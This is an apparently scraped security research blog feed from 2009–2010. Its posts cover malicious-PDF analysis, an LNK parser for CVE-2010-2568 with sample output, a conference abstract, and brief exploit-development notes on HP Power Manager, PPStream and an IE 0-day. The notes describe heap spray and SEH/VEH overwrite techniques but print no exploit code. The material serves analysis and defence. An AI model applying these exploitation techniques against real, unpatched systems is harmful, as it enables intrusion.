<li>Please provide an automated solution to extract and analyze JavaScript code within the PDF file. Be creative! (<span class="GRcorrect" grphrase="373be35999739c3c2742d9d9cf25a27817dee20b" grtype="null" id="GRmark_373be35999739c3c2742d9d9cf25a27817dee20b_describe:0">describe</span> your solution below, but submit any source code and executable in a compressed zip file with <span class="GRcorrect" grphrase="373be35999739c3c2742d9d9cf25a27817dee20b" grtype="null" id="GRmark_373be35999739c3c2742d9d9cf25a27817dee20b_file name:1">file name</span> [your email<span class="GRcorrect" grphrase="373be35999739c3c2742d9d9cf25a27817dee20b" grtype="null" id="GRmark_373be35999739c3c2742d9d9cf25a27817dee20b_]:2">]</span>_Forensic Challenge 2010 – Challenge 6 – Bonus2.zip via our submission form<a href="http://www.honeynet.org/challenge2010/" style="color: #00a3db; text-decoration: initial;" title="http://www.honeynet.org/challenge2010/">http://www.honeynet.org/challenge2010/</a>.) (1pt)</li>
</ol>
<div>
<span style="color: #494949; font-family: Verdana;"><span style="font-size: 12px; line-height: 20px;">To get it started, you need to start by inspecting a PCAP file. It can be downloaded from this <a href="http://www.honeynet.org/files/lala.pcap" target="_blank">page</a>. </span></span></div>
<div>
<span style="color: #494949; font-family: Verdana;"><span style="font-size: 12px; line-height: 20px;"><br /></span></span></div>
<div>
<span style="color: #494949; font-family: Verdana;"><span style="font-size: 12px; line-height: 20px;"><br /></span></span></div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-6932470918023027512010-08-25T07:36:00.000-07:002012-11-12T09:42:19.880-08:00Malicious PDF Technical Analysis Write Up<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
For the 2010, <span class="GRcorrect" grphrase="2c7e6ef1335a20956daefe6e71ecae6864fd5509" grtype="null" id="GRmark_2c7e6ef1335a20956daefe6e71ecae6864fd5509_i:0">i</span> spent a bit of my time on poking with malicious PDF analysis. I came up with a technical write up for the analyzing malicious pdf. The title for the write up is "Getting Owned by Malicious PDF". I split the write up into multiple samples sorting from easy-to-moderate of challenges and obstacle when dealing with malicious pdf analysis.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It starts with an introduction on PDF structures and components. The next section is on analyzing with vanilla pdf which only have a plain and flat PDF structure. This is a good introduction to familiar audience to PDF structure and also to expose on malicious pdf threat. On this sample, the analysis focus on understanding the PDF internal and extracting interesting components such as /Root object, javascript code and <span class="GRcorrect" grphrase="de04ada8f367b2c1546b52ab60952d654addfa3f" grtype="null" id="GRmark_de04ada8f367b2c1546b52ab60952d654addfa3f_shellcode:0">shellcode</span> (within the javascript code).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The second sample involves with compressed PDF components by utilizing PDF feature, /Filter. /Filter will allow any PDF objects to be compressed using compression algorithms and decoding method such as <span class="GRcorrect" grphrase="6f5c6ccbe36ee72e0b717d67594b38f761d8b5db" grtype="null" id="GRmark_6f5c6ccbe36ee72e0b717d67594b38f761d8b5db_zlib:0">zlib</span> compression for /FlatDecode filter, <span class="GRcorrect" grphrase="6f5c6ccbe36ee72e0b717d67594b38f761d8b5db" grtype="null" id="GRmark_6f5c6ccbe36ee72e0b717d67594b38f761d8b5db_ascii:1">ascii</span>-to-hex for<span style="color: #222222; font-family: arial, sans-serif;"><span style="line-height: 16px;"> /ASCIIHexDecode filter. There are many methods can be implemented. Please read a good PDF <span class="GRcorrect" grphrase="54b1d764ec4f7d4120941d3fa75f41e27745ab2c" grtype="null" id="GRmark_54b1d764ec4f7d4120941d3fa75f41e27745ab2c_Spesification:0">Specification</span><span class="GRcorrect" grphrase="54b1d764ec4f7d4120941d3fa75f41e27745ab2c" grtype="null" id="GRmark_54b1d764ec4f7d4120941d3fa75f41e27745ab2c_Spesification:0"> </span> format by Adobe.</span></span></div>
<div style="text-align: left;">
</div>
<span style="color: #222222; font-family: arial, sans-serif; line-height: 16px;"><br /></span><span style="color: #222222; font-family: arial, sans-serif; line-height: 16px;">For the details on samples 3, 4 please feel free to download and read the write up from SANS's web page </span><a href="http://www.sans.org/reading_room/whitepapers/malicious/owned-malicious-pdf-analysis_33443" style="font-family: arial, sans-serif; line-height: 16px;" target="_blank">here</a><span style="color: #222222; font-family: arial, sans-serif; line-height: 16px;">. </span></div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com1tag:blogger.com,1999:blog-16641472.post-69260552038417467122010-07-27T03:08:00.000-07:002012-11-18T03:10:02.784-08:00LNK (Windows File Shortcut) Parser For CVE-2010-2568<div dir="ltr" style="text-align: left;" trbidi="on">
<span class="GRcorrect" grphrase="cb46b325ed3192835c8eecc0a4cb1fd5ada015f4" grtype="null" id="GRmark_cb46b325ed3192835c8eecc0a4cb1fd5ada015f4_lalal:0">lalal</span><br />
<br />
<a href="http://www.microsoft.com/technet/security/advisory/2286198.mspx" target="_blank">CVE-2010-2568</a> will need to have a LNK file with a malicious <span class="GRcorrect" grphrase="a97f85a9f08b4599a669d2678ee3f8195190b90d" grtype="null" id="GRmark_a97f85a9f08b4599a669d2678ee3f8195190b90d_dll:1">dll</span> to cause harm. Feeling the urgency of parsing the LNK file to trace any present <span class="GRcorrect" grphrase="e43cc30119d6738dcbd34c53b62b7c3512fa1aed" grtype="null" id="GRmark_e43cc30119d6738dcbd34c53b62b7c3512fa1aed_dll:0">dll</span>, <span class="GRcorrect" grphrase="e43cc30119d6738dcbd34c53b62b7c3512fa1aed" grtype="null" id="GRmark_e43cc30119d6738dcbd34c53b62b7c3512fa1aed_i:1">i</span> modified a small portion of the code from <span class="GRcorrect" grphrase="e43cc30119d6738dcbd34c53b62b7c3512fa1aed" grtype="null" id="GRmark_e43cc30119d6738dcbd34c53b62b7c3512fa1aed_metasploit’s:2">metasploit’s</span> project to make it run independently from the <span class="GRcorrect" grphrase="e43cc30119d6738dcbd34c53b62b7c3512fa1aed" grtype="null" id="GRmark_e43cc30119d6738dcbd34c53b62b7c3512fa1aed_metasploit:3">metasploit</span> framework. The original code is <a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/scripts/meterpreter/dumplinks.rb" target="_blank">here</a>. The main purpose of the <span class="GRcorrect" grphrase="1e91a2d4c536bb003c6024e8d955b7e67e121af5" grtype="null" id="GRmark_1e91a2d4c536bb003c6024e8d955b7e67e121af5_dumplinks:0">dumplinks</span><span class="GRcorrect" grphrase="1e91a2d4c536bb003c6024e8d955b7e67e121af5" grtype="null" id="GRmark_1e91a2d4c536bb003c6024e8d955b7e67e121af5_.:1">.</span><span class="GRcorrect" grphrase="1e91a2d4c536bb003c6024e8d955b7e67e121af5" grtype="null" id="GRmark_1e91a2d4c536bb003c6024e8d955b7e67e121af5_rb is:2">rb is</span> for getting information for each of LNK files. The code is originally coded by <span class="GRcorrect" grphrase="da9f4204df7360b814f6bf665399100cf13f0b67" grtype="null" id="GRmark_da9f4204df7360b814f6bf665399100cf13f0b67_davehull:0">davehull</span>. Here is the output of the modified code:<br />
<br />
<br />
<div style="background-color: #d5d6d7; color: #333333; font-family: 'Lucida Grande', Verdana, Arial, sans-serif; font-size: 12px; line-height: 16.78333282470703px; text-align: justify;">
<br /></div>
<pre lang="bash" style="background-color: #d5d6d7; color: #333333; line-height: 16.78333282470703px; text-align: justify;">[+<span class="GRcorrect" grphrase="b29566897a9d07cac2d36dc4371f0b6e17947b45" grtype="null" id="GRmark_b29566897a9d07cac2d36dc4371f0b6e17947b45_]:0">]</span>Processing: <span class="GRcorrect" grphrase="b29566897a9d07cac2d36dc4371f0b6e17947b45" grtype="null" id="GRmark_b29566897a9d07cac2d36dc4371f0b6e17947b45_lalameta:1">lalameta</span><span class="GRcorrect" grphrase="b29566897a9d07cac2d36dc4371f0b6e17947b45" grtype="null" id="GRmark_b29566897a9d07cac2d36dc4371f0b6e17947b45_.:2">.</span><span class="GRcorrect" grphrase="b29566897a9d07cac2d36dc4371f0b6e17947b45" grtype="null" id="GRmark_b29566897a9d07cac2d36dc4371f0b6e17947b45_lnk:3">lnk</span>
[+<span class="GRcorrect" grphrase="a7690cdb6bb32d74e75386dabb439136b56b216d" grtype="null" id="GRmark_a7690cdb6bb32d74e75386dabb439136b56b216d_]:0">]</span>Found CLSID=00021401-0000-0000-C000-0000000000460
<span class="GRcorrect" grphrase="452b60fa2999f068a5ab17ff33dd8edfad799ed7" grtype="null" id="GRmark_452b60fa2999f068a5ab17ff33dd8edfad799ed7_lalameta:0">lalameta</span><span class="GRcorrect" grphrase="452b60fa2999f068a5ab17ff33dd8edfad799ed7" grtype="null" id="GRmark_452b60fa2999f068a5ab17ff33dd8edfad799ed7_.:1">.</span><span class="GRcorrect" grphrase="452b60fa2999f068a5ab17ff33dd8edfad799ed7" grtype="null" id="GRmark_452b60fa2999f068a5ab17ff33dd8edfad799ed7_lnk:2">lnk</span>:
Access Time = Tue Jul 27 17:16:06 +0800 2010
<span class="GRcorrect" grphrase="8513bf5f1f812df785c7d595c15322c76e98b360" grtype="null" id="GRmark_8513bf5f1f812df785c7d595c15322c76e98b360_Creation:0">Creation</span> Date = Thu Jul 22 01:16:24 +0800 2010
Modification Time = Thu Jul 22 01:16:24 +0800 2010
Contents of <span class="GRcorrect" grphrase="f974b8ea788dc163735f470b4c9e8fde396c734b" grtype="null" id="GRmark_f974b8ea788dc163735f470b4c9e8fde396c734b_lalameta:0">lalameta</span><span class="GRcorrect" grphrase="f974b8ea788dc163735f470b4c9e8fde396c734b" grtype="null" id="GRmark_f974b8ea788dc163735f470b4c9e8fde396c734b_.:1">.</span><span class="GRcorrect" grphrase="f974b8ea788dc163735f470b4c9e8fde396c734b" grtype="null" id="GRmark_f974b8ea788dc163735f470b4c9e8fde396c734b_lnk:2">lnk</span>:
Flags:
Attributes:
Target file's MAC Times stored in <span class="GRcorrect" grphrase="c22ca6812d7402f6f20afcb4555bab3d4f5d439c" grtype="null" id="GRmark_c22ca6812d7402f6f20afcb4555bab3d4f5d439c_lnk file:0">lnk file</span>:
Creation Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Modification Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Access Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
<span class="GRcorrect" grphrase="8bc901db5ebcf7374162e79cfc619d7e01b984da" grtype="null" id="GRmark_8bc901db5ebcf7374162e79cfc619d7e01b984da_ShowWnd:0">ShowWnd</span> value(s):
Target file's MAC Times stored in <span class="GRcorrect" grphrase="c22ca6812d7402f6f20afcb4555bab3d4f5d439c" grtype="null" id="GRmark_c22ca6812d7402f6f20afcb4555bab3d4f5d439c_lnk file:0">lnk file</span>:
Creation Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Modification Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Access Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
[+<span class="GRcorrect" grphrase="891d09bfec9fd7aaa631551135c87f67a6a69308" grtype="null" id="GRmark_891d09bfec9fd7aaa631551135c87f67a6a69308_]:0">]</span>checking offset of 0x80 to find <span class="GRcorrect" grphrase="891d09bfec9fd7aaa631551135c87f67a6a69308" grtype="null" id="GRmark_891d09bfec9fd7aaa631551135c87f67a6a69308_DLL:1">DLL</span> from <span class="GRcorrect" grphrase="891d09bfec9fd7aaa631551135c87f67a6a69308" grtype="null" id="GRmark_891d09bfec9fd7aaa631551135c87f67a6a69308_metasploit:2">metasploit</span> code generator
[+]:<strong>\\192.168.20.2\xyTxzY\CjmX.dll</strong>
</pre>
<div style="background-color: #d5d6d7; color: #333333; font-family: 'Lucida Grande', Verdana, Arial, sans-serif; font-size: 12px; line-height: 16.78333282470703px; text-align: justify;">
The code in bold shows that the DLL that is loaded in the LNK file. Below is the result from p0c provided by <a href="http://www.ivanlef0u.tuxfamily.org/?p=411" style="color: #b85b5a; text-decoration: initial;">ivanlef0u</a>.</div>
<pre lang="bash" style="background-color: #d5d6d7; color: #333333; line-height: 16.78333282470703px; text-align: justify;">[+<span class="GRcorrect" grphrase="af181c6a6b614ab667cc904a6841ff91cc829ceb" grtype="null" id="GRmark_af181c6a6b614ab667cc904a6841ff91cc829ceb_]:0">]</span>Processing: <span class="GRcorrect" grphrase="af181c6a6b614ab667cc904a6841ff91cc829ceb" grtype="null" id="GRmark_af181c6a6b614ab667cc904a6841ff91cc829ceb_suckme:1">suckme</span><span class="GRcorrect" grphrase="af181c6a6b614ab667cc904a6841ff91cc829ceb" grtype="null" id="GRmark_af181c6a6b614ab667cc904a6841ff91cc829ceb_.:2">.</span>lnk_
129
<span class="GRcorrect" grphrase="2e13846fe3aa6bc9f49933608255b253900aadb0" grtype="null" id="GRmark_2e13846fe3aa6bc9f49933608255b253900aadb0_suckme:0">suckme</span><span class="GRcorrect" grphrase="2e13846fe3aa6bc9f49933608255b253900aadb0" grtype="null" id="GRmark_2e13846fe3aa6bc9f49933608255b253900aadb0_.:1">.</span>lnk_:
Access Time = Tue Jul 27 17:52:02 +0800 2010
<span class="GRcorrect" grphrase="e8e04708ae6bc45061d408e944f716b8fbc2efd1" grtype="null" id="GRmark_e8e04708ae6bc45061d408e944f716b8fbc2efd1_Creation:0">Creation</span> Date = Mon Jul 19 10:32:26 +0800 2010
Modification Time = Sun Jul 18 00:37:30 +0800 2010
Contents of <span class="GRcorrect" grphrase="a89fb32b847bbd906ea7ae3dd4ad22c016a09c33" grtype="null" id="GRmark_a89fb32b847bbd906ea7ae3dd4ad22c016a09c33_suckme:0">suckme</span><span class="GRcorrect" grphrase="a89fb32b847bbd906ea7ae3dd4ad22c016a09c33" grtype="null" id="GRmark_a89fb32b847bbd906ea7ae3dd4ad22c016a09c33_.:1">.</span>lnk_:
Flags:
Shell Item ID List exists.
Attributes:
Target file's MAC Times stored in <span class="GRcorrect" grphrase="c22ca6812d7402f6f20afcb4555bab3d4f5d439c" grtype="null" id="GRmark_c22ca6812d7402f6f20afcb4555bab3d4f5d439c_lnk file:0">lnk file</span>:
Creation Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Modification Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Access Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
<span class="GRcorrect" grphrase="8bc901db5ebcf7374162e79cfc619d7e01b984da" grtype="null" id="GRmark_8bc901db5ebcf7374162e79cfc619d7e01b984da_ShowWnd:0">ShowWnd</span> value(s):
SW_SHOW.
SW_NORMAL.
SW_SHOWMINNOACTIVE.
SW_SHOWMAXIMIZED.
SW_RESTORE.
Target file's MAC Times stored in <span class="GRcorrect" grphrase="c22ca6812d7402f6f20afcb4555bab3d4f5d439c" grtype="null" id="GRmark_c22ca6812d7402f6f20afcb4555bab3d4f5d439c_lnk file:0">lnk file</span>:
Creation Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Modification Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Access Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
[+<span class="GRcorrect" grphrase="0decf934240c049c6e740d23a56fe20cbd30a921" grtype="null" id="GRmark_0decf934240c049c6e740d23a56fe20cbd30a921_]:0">]</span>checking offset of 0x80 to find <span class="GRcorrect" grphrase="0decf934240c049c6e740d23a56fe20cbd30a921" grtype="null" id="GRmark_0decf934240c049c6e740d23a56fe20cbd30a921_DLL:1">DLL</span> from <span class="GRcorrect" grphrase="0decf934240c049c6e740d23a56fe20cbd30a921" grtype="null" id="GRmark_0decf934240c049c6e740d23a56fe20cbd30a921_metasploit:2">metasploit</span> code
[+]: <strong>:C:\dll.dll</strong>Mises ? <span class="GRcorrect" grphrase="ad6228d16c5e595d3a2f5b1e596cc8f082953f3c" grtype="null" id="GRmark_ad6228d16c5e595d3a2f5b1e596cc8f082953f3c_jour:0">jour</span> <span class="GRcorrect" grphrase="ad6228d16c5e595d3a2f5b1e596cc8f082953f3c" grtype="null" id="GRmark_ad6228d16c5e595d3a2f5b1e596cc8f082953f3c_automatiquesCo:1">automatiquesCo</span></pre>
<br />
<br /></div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-61272118247945071972010-06-07T08:32:00.000-07:002012-11-12T09:42:34.452-08:00Hello Miami and Lets Talk on Portable Desctructive PDF.<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">I'll speaking at the 22th FIRST conference </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;"><span class="GRcorrect" grphrase="a1c79089a6da3d228ec8e39b3ae38d9d76cf968b" grtype="null" id="GRmark_a1c79089a6da3d228ec8e39b3ae38d9d76cf968b_at:1">at</span></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;"> Miami next week. The topic of my presentation is PDF: Portable Destructive File: Attacks And Analysis. I'll be sharing on dissecting malicious PDF and how we can perform an analysis on the malicious PDF file. Below is my abstract for the presentation.[http://conference.first.org/2010/Program/program.aspx]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;"><br /></span>
<strong style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;"><br /></strong>
<strong style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">Portable Destructive File (PDF) Attacks and Analysis</strong><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;"></span><br />
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
The increased prevalence of malicious Portable Document Format (PDF) files has generated interest in techniques to perform analysis on such document<span class="GRcorrect" grphrase="93361fcdcb2be9a537de0a1f3f5ff472c778d230" grtype="null" id="GRmark_93361fcdcb2be9a537de0a1f3f5ff472c778d230_.:0">.</span>We have observed a lot of attacks try to abuse the PDF vulnerabilities by hosting malicious pdf files on the Internet. The modus operandi involved in <span class="GRcorrect" grphrase="654f5b85f0927580b4e684bfb1bad326666dc7bd" grtype="null" id="GRmark_654f5b85f0927580b4e684bfb1bad326666dc7bd_lurking:0">lurking</span> people to open malicious PDF files by using social engineering attack. The emails were sent with a link to PDF file, by attaching the malicious PDF file directly to trap <span class="GRcorrect" grphrase="675ed60fb26672069ab0e585dec22de2a089c9cb" grtype="null" id="GRmark_675ed60fb26672069ab0e585dec22de2a089c9cb_victim:0">victim</span> to open the files.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
In this presentation we will share with you on how to analyze malicious PDF files which abusing JavaScript for exploitation and as well as using it as attacker payloads. What you will learn here will help you to analyze malicious PDF files on your own by using freely available tools.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
<br /></div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-76499374800695759832009-11-19T02:55:00.000-08:002012-11-18T02:58:05.593-08:00Another 0day on HP Power Manager<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="p1" style="text-align: justify;">
I have been working on this <span class="s1">CVE-2009-2685</span>/ZDI (<a href="http://www.zerodayinitiative.com/advisories/ZDI-09-081/"><span class="s2">http://www.zerodayinitiative.com/advisories/ZDI-09-081/</span></a>) this afternoon and now managed to get the dummy <span class="GRspelling" grtype="null">shellcode</span> (calc.exe) running.yey..:D</div>
<div class="p1" style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6XYY5vmqMnwu44g67D8OY1XPTtaJwi1I5V-GPdCvfflTnJderIC2Wy6bHM7OCfN3rJ7sZaEbuV3N7P9GEyeZSHuBbGyxxLc65YlJ_C1VXV01dsFpLuTnVR9ffHaEm2FYznIu4/s1600/ishot_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6XYY5vmqMnwu44g67D8OY1XPTtaJwi1I5V-GPdCvfflTnJderIC2Wy6bHM7OCfN3rJ7sZaEbuV3N7P9GEyeZSHuBbGyxxLc65YlJ_C1VXV01dsFpLuTnVR9ffHaEm2FYznIu4/s400/ishot_3.png" width="400" /></a></div>
<div class="p1" style="text-align: justify;">
<br /></div>
<div class="p2" style="text-align: justify;">
<br /></div>
<div class="p1" style="text-align: justify;">
The bug was mentioned by ZDI at link provided, and as claimed by HP advisory, they already patch the bug(<a href="http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01905743"><span class="s2">http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01905743</span></a>).</div>
<div class="p2" style="text-align: justify;">
<br /></div>
<div class="p1" style="text-align: justify;">
Ironically, by using the same patch released by HP (4.9.2 - The latest one), i still managed to exploit the code. I guess, HP didn't really patch the bug. This is probably wild guess, but if we take a look at workaround, HP only recommending to limit the HP Power Manager Server access to trusted user/ip/network.</div>
<div class="p2" style="text-align: justify;">
<br /></div>
<div class="p1" style="text-align: justify;">
Exploiting this bug is trivial, though. Reading from any windows exploitation materials is enough. This standard/classic stack overflow for sprint bug. </div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com110tag:blogger.com,1999:blog-16641472.post-38197265509391615752009-10-20T00:16:00.000-07:002012-12-05T00:17:39.282-08:00PPStream 0day<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I just finished working on the <a href="http://www.pps.tv/" target="_blank">PPStream</a> exploit. The <a href="http://milw0rm.com/exploits/9585" target="_blank">p0c</a> to reproduce the bug was released at Milw0rm a few days go. By using the default exploit, we’ll notice that the bug is related to heap corruption instead just typical stack overflow on ActiveX. In stack overflow on ActiveX app, we can just simply heap spray the browser and overwrite SEH to get control of EIP and jump to heap to get to our shellcode. But, since this is heap overflow, overwriting SEH pointer is not possible due SEH pointer is located inside a stack frame instead of heap frame. On this particular exploitation, we need to rely on heap exploitation to get control of EIP.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After further analysis on the bug, i noticed that the param ofBackImage is the key to get heap overflow occur. So i made a little bit changes on p0c and start debugging on the p0c again. Since the key point of heap exploitation is to get control when heap is doing coalesce we need to get this assembly code (this is when heap is doing coalesce,we can have arbitrary overwrite if we can overflow the next/prev chunk) :</div>
<br />
<span style="font-family: Courier New, Courier, monospace;">move dword ptr [eax],ecx ds:0023:41414141=?????</span><br />
<br />
<div style="text-align: justify;">
Since my target machine is running on XP SP1, i still can use arbitrary overwrite [WHERE] to VEH pointer. And to get reliable value on my shellcode location [WHAT], i’m using heap spray to place my shellcode. Below are the screenshot of the calc.exe got executed when vulnerable PPSTream (V2.6.86.8900) open the exploit page (via IE browser) (I promised i wont used Heap Spray technique ;)).</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqUiinm0xrRGeOowwj7OXJoMaRYh2Gfv4rv1SJlMGPbX49Ku0fR5Qkgrd7nbl_0DI6XtIH6DnVpgAYenVXHgsUv9fSd3DziU2SULW-wd1xSj8FAQEgwV092KNU9DCtSpQhobJv/s1600/ppstream_0day_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqUiinm0xrRGeOowwj7OXJoMaRYh2Gfv4rv1SJlMGPbX49Ku0fR5Qkgrd7nbl_0DI6XtIH6DnVpgAYenVXHgsUv9fSd3DziU2SULW-wd1xSj8FAQEgwV092KNU9DCtSpQhobJv/s400/ppstream_0day_calc.png" width="400" /></a></div>
<br />
<br />
<div style="text-align: justify;">
I apologize for very brief/basic information on this bug and also not releasing the exploit code. The reason is due to the current PPStream is not yet have a patch (during this blog post writing). I hope that one fine day i can publish this simple exploitation dev article.</div>
<br />
<br /></div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-41893093656017448982009-07-22T00:48:00.000-07:002012-12-05T00:49:45.071-08:00Another IE 0-day<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Another 0-day was released in-the-wild targeting Microsoft Internet Explorer. The bug is inside msvidctl.dll when working with media file (*.gif have been used in the wild exploitation). Below is the in-the-wild exploit analyzed by us (we modified the shellcode to %uxcccc).<br />
<br />
Figure 1.0 showed the exception handler is executed and will pointing to our jump address (0c0c0c0c).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIv1fVNnCu1Frni36QC6prxh-IRYZTJXVB9qxDuLwHd9OOgQdvVWJW56unfe4IfV34xaQJEnkom3Q9teHU4y0VPiq6_FmRMk9r0GDEArMnphvDMu-2q918EyP3C4lmKj5z4LQD/s1600/0day-ie1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIv1fVNnCu1Frni36QC6prxh-IRYZTJXVB9qxDuLwHd9OOgQdvVWJW56unfe4IfV34xaQJEnkom3Q9teHU4y0VPiq6_FmRMk9r0GDEArMnphvDMu-2q918EyP3C4lmKj5z4LQD/s400/0day-ie1.png" width="400" /></a></div>
<br />
Figure 2.0 show the shellcode (xcc) been executed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuuMRSX01mAxYL_-KOEDpzcA3VhyiT6YkCcYOQ0ahB4E7DG55VSqjWisOQHA3V1UXQfnWAzTq-Ok6Dukey8wRZx6k5A4iPCTmOclu2AtSnssMsn-JD6SmP_olS3PEGcZEujrC9/s1600/0day-ie2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuuMRSX01mAxYL_-KOEDpzcA3VhyiT6YkCcYOQ0ahB4E7DG55VSqjWisOQHA3V1UXQfnWAzTq-Ok6Dukey8wRZx6k5A4iPCTmOclu2AtSnssMsn-JD6SmP_olS3PEGcZEujrC9/s400/0day-ie2.png" width="400" /></a></div>
<br />
<br />
<br />
<div style="text-align: justify;">
It's not really a common stack overflow bug. Please read excellent vulnerability analysis done by websense <a href="http://securitylabs.websense.com/content/Blogs/3434.aspx">here</a>.</div>
<br />
<div style="text-align: justify;">
MyCERT released the <a href="http://www.mycert.org.my/en/services/advisories/mycert/2009/main/detail/677/index.html">advisory</a> and workaround (yes, with pictures) on how to do the 'kill-bit' thing for this particular CLSID.</div>
<br />
<br /></div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-86432683211498216792009-07-15T00:25:00.000-07:002012-12-05T00:26:46.215-08:00Conficker.C and DNS<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I have been working to track conficker's dns queries in order to identify infected machines/network with conficker.c. Tracking a 50K DNS names and 500++ queries from each conficker is a bit troublesome when u have to record all the DNS queries (200M records/day) and compare it with 50K/day conficker.c domain names.:).<br />
<br />
The main idea of why we're working on this so that the infected machine can be identify based on queries made by conficker.c to contact to the conficker.c's c&amp;c. Below is one of the result from our tracking on conficker.c dns query to .MY domains in the hitlist :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSD-CF14buvtju87Nu1vq8TVIBSq8jpIm1X0zhasv84X3AwTy9oSTryGEqmcGVDjH9egeZk-Uk-VQ1kn6y9Fl9Buq4k5ibYrJ7T4rR6MRiWcvTD8Nlg3OGEo5WvnlytzQW8AV6/s1600/conficker_domain_dns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSD-CF14buvtju87Nu1vq8TVIBSq8jpIm1X0zhasv84X3AwTy9oSTryGEqmcGVDjH9egeZk-Uk-VQ1kn6y9Fl9Buq4k5ibYrJ7T4rR6MRiWcvTD8Nlg3OGEo5WvnlytzQW8AV6/s400/conficker_domain_dns.png" width="400" /></a></div>
<br />
<br />
<br />
Another result for the tracker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijq1kMAJ7Ihe01PSQZS8L76qrrzms-4-sXkh28eXhluFdNG67-NIQvyRzgLXB-a4jfac3RUkFtFRrjPBjSQ1Ggt3vQjt42r4oeb6Y_UdeuzQPxZPDxt2oTK60xDz-GulAYmfac/s1600/conficker_domain_dns_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijq1kMAJ7Ihe01PSQZS8L76qrrzms-4-sXkh28eXhluFdNG67-NIQvyRzgLXB-a4jfac3RUkFtFRrjPBjSQ1Ggt3vQjt42r4oeb6Y_UdeuzQPxZPDxt2oTK60xDz-GulAYmfac/s400/conficker_domain_dns_2.png" width="400" /></a></div>
<br />
Looking at the trends from both pictures, its coming from the same source (see over geomap). Why?..:)<br />
<br />
